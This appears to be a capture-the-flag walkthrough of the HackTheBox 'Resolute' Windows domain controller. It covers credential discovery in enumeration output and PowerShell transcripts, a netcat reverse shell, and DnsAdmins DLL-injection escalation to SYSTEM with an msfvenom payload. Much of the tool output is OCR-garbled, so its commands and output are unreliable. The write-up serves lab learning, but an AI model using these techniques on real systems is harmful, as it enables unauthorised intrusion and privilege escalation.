Tag: resolute no metasploit

Resolute – No Metasploit

Doing initial nmap recon, we get some lengthy output:

PORT 53/tcp 88/tcp 135/tcp 139/tcp 389/tcp 445/tcp 464/tcp 593/tcp 636/tcp 3268/tcp 3269/tcp 5985/tcp STATE open open open open open open open open open open open open SERVICE domain? kerberos-sec msrpc netbios-ssn Idap microsoft-ds kpasswd5? ncacn_http tcpwrapped Idap tcpwrapped http REASON syn syn syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 127 127 VERSION Microsoft Windows Kerberos (server time: 2020-05-19 20: øø: 38Z) Microsoft Windows RPC Microsoft Windows netbios-ssn Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) Microsoft Windows RPC over HTTP I.ø Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnp) .NET Message Framing Default-First-Site-Name) Default-First-Site-Name) l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 9389/tcp open mc-nmf 47ØØ1/tcp open http syn-ack tt1 127 syn-ack tt1 127 l_http-server-header: Microsoft-HTTPAPI/2.0 I _http-title: Not Found 49664/tcp 49665/tcp 49666/tcp 49667/tcp 49671/tcp 49676/tcp 49677/tcp 49688/tcp 49712/tcp 5519Ø/tcp open open open open open open open open open open msrpc msrpc msrpc msrpc msrpc ncacn_http msrpc msrpc msrpc unknown syn syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack -ack 127 127 127 127 127 127 127 127 127 127 Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft HTTPAPI Windows Windows Windows Windows Windows Windows Windows Windows Windows httpd 2.0 (SSDP/UPnp) RPC RPC RPC RPC RPC RPC over HTTP 1.0 RPC RPC RPC Aggressive OS guesses: Microsoft 10 1507 (93%), Microsoft Windows 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows Windows Server 2016 build 10586 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%) 10 1507 - , Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ) .

So it looks like it’s a Windows box with quite a lot of ports open. My eye first caught Ports 139/445. So using enum4linux against resolute, we get some interesting information. I missed this the first time, but looking back over everything line-by-line, I was able to find some really juicy info:

Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group Group ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain ' Domain Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' Users ' (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: (RID: 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) 513) has has has has has has has has has has has has has has has has has has has has has has has has has has member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : member : MEGABANK\Administrator MEGABANK\DefauI tAccount MEGABANK\krbtgt MEGABANK\ryan MEGABANK\marko MEGABANK\sunita MEGABANK\abigai1 MEGABANK\marcus MEGABANK\sa1ty MEGABANK\fred MEGABANK\angeIa MEGABANK\feIicia MEGABANK\gustavo MEGABANK\u1f MEGABANK\stevie MEGABANK\c1aire MEGABANK\pau10 MEGABANK\steve MEGABANK\annette MEGABANK\annika MEGABANK\per MEGABANK\cmaude MEGABANK\me1anie MEGABANK\zach MEGABANK\simon MEGABANK\naoki
index: øx1øa9 RID: øx457 acb: øxøøøøø21ø Account: . Password set to Welcome123! marko Name: Marko Novak Desc : Account created

Okay so we see Marko Novak’s password is set to Welcome123! Trying this with evil-winrm to login, we get an authentication failure. However, let’s think this through. This looks like the default password created for new users. Running down the list, we try this with the user melanie

sudo evil-winrm -p Evil-WinRM shell v2.3 -i 10.10.10.169 -u melanie 'Welcome123! ' Info: Establishing connection to remote endpoint PS C: cd . PS C: dir -WinRb1*•

So from here, I actually used Powershell and uploaded nc.exe to get a more stable shell. Call me old-fashioned, but I just don’t like the Evil-WinRM shell.

PS C: Start-process 'C: .exe' umentList '-e cmd.exe 10.10.14.22 "3' -Arg
sudo nc -nvlp 443 listening on [any] 1+1+3 connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 53534 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Users

I don’t remember quite why, but I ended up using Evil-WinRM’s shell anyway. It’s good to have a backup.

Looking around, we find an unusual file under C:\ called “PSTranscripts”. We enumerated hidden files with dir -FORCE from the PowerShell prompt to find PSTranscripts.

ps C: type PowerShe11_transcript .RESOLUTE.OJuoBGhU.2ø1912ø3ø632ø1.txt Windows PowerSheII transcript start Start time: 20191203063201 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: I.ø, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtoc01Version: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063455 PS>TerminatingError(): "System error. " ComandInvocation(Invoke-Expression): "Invoke-Expression " ParameterBinding(Invoke-Expression): name= "Command" ; value- " if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value- "True" Command start time: 20191203063455 PS>ParameterBinding(Out-String): name* "InputObject" ; PS megabank\ryanöRESOLUTE Documents> ' ,$(whoami), ,$env:computername,' ' $pwd) .Name), ' ) - PS megabank\ryanöRESOLUTE Documents> value- "
Command start time: 20191203063515 " Invoke-Expression " ParameterBinding(Invoke-Expression): name- "Command" ; value-"cmd /c net use X: if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } CommandInvocation(Out-String): "Out-string" ParameterBinding(Out-String): name* "Stream"; value-" - True" Windows PowerSheII transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393 .ø) Host Application: C: . exe -Embedding ryan Serv3r4Admin4cc123! Process ID: 2800 psversion: 5.1.14393.2273 PSEdition: Desktop PSCompatib1eVersions: 1.0, 2.0 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42øøø WSManStackVersion: 3.0 PSRemotingProtocoIVersion: 2.3 SerializationVersion: 1.1.ø.1 , 3.0 , 4.0, 5.0, 5.1.14393.2273 Command start time: 20191203063515 "Out-string" ParameterBinding(Out-String): ; cmd : The syntax of this command is: At line:l char:l value* "The syntax of this command is:" + cmd /c net use X: ryan Serv3r4Admin4cc123! + Categorylnfo NotSpecified: (The syntax of this command is: :string) [ ] , + FullyQua1ifiedErrorId NativeComandError cmd : The syntax of this command is: At line:l char:l + cmd /c net use X: ryan Serv3r4Admin4cc123! RemoteException RemoteException + Categorylnfo + FullyQua1ifiedErrorId Windows PowerShe11 transcript start time: 20191203063515 NotSpecified: (The syntax of this command is: :string) [ ] , NativeComandError start

Did you see it? ryan’s password is in the other transcript file! Password: Serv3r4Admin4cc123!

Let’s try these creds with ryan:

Alright, time to look around. We enumerated around, looking at basic stuff like whoami /groups

GROUP INFORMATION Group Name Everyone BUILTIN\Users BUILTIN\Pre-Windows 2øøø Compatible PS C: whoami /groups s-l-l-ø 32—545 —32—554 s-1-5-32-580 s-1 s-1-5-11 s-1-5-15 s 5-64-10 Access BUILTIN\Remote Management Users NT AUTHORITY\NETWORK NT AUTHORITY\Authenticated Users NT AUTHORITY\This Organization MEGABANK\Contractors MEGABANK\DnsAdmins NT AUTHORITY\NTLM Authentication Mandatory Label\Medium Mandatory Type Well-known Alias Alias Alias Well-known Well-known Well-known Group Alias Well-known Label group group group group group SID s-1-5- s-1-5 s-1-5-21-1392959593-3013219662-3596683436-1103 s-1-5-21-1392959593-3013219662-3596683436-1101 s-1-16-8192 Attributes Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory group , group , group , group , group , group , group , group , group , group , Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled by by by by by by by by by by default, default, default, default, default, default, default, default, default, default, Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled group group group group group group group group group, Local Group group Level

After a while, I came up with nothing. I used PowerUp.ps1 to find an interesting potential exploit:

HijackabIePath : C: AbuseFunction . Write-HijackDII -OutputFiIe 'C: . dll' -Command

This link actually helped me out a lot in understanding what to do next.

So, I created a malicious DLL:

kaliö)hyd3 . —"Documents/htb/resolute$ msfvenom -p L HOST=1ø.1ø.14.22 LPORT=443 -a -f -o wibsctrl.dll [-] No platform was selected, choosing Msf: :Modu1e: :P1atform: :Windows from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dil file: 5120 bytes Saved as: wlbsctrl .dII

Then I served it up on SMB:

kaliö)hyd3: "Documents/htb/resolute$ sudo python3 /usr/share/doc/python3-impacket/exampIes/smbserver .py ROPNOP /home/kaIi/Documents/htb/resoIute/ Impacket vø.9 .21 - Copyright 2020 SecureAuth Corporation

And I injected the DLL remotely (really cool new trick I didn’t know before):

PS C: dnscmd .exe RESOLUTE /config /serverlevelplugindll Registry property server1eve1p1ugind11 successfully reset . Command completed successfully. PS C: sc . exe stop dns SERVICE NAME: dns TYPE STATE WIN32 EXIT CODE SERVICE EXIT CODE CHECKPOINT WAIT HINT 10 WIN32 OWN PROCESS 3 STOP PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) (øxø) (øxø) øxø øxø PS C: sc . exe start dns

I then started the DNS process as seen above. With the listener on port 443, I caught an NT AUTHORITY\SYSTEM shell:

listening on [any] 1+1+3 . connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 52809 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved . C: \Windows whoami nt authority\system C: C: . txt type C: . txt The system cannot find the file specified. cd C: C: Desktop\root . txt type Desktop\root . txt eld94876a5ø685ødøc2øedb5W5e619c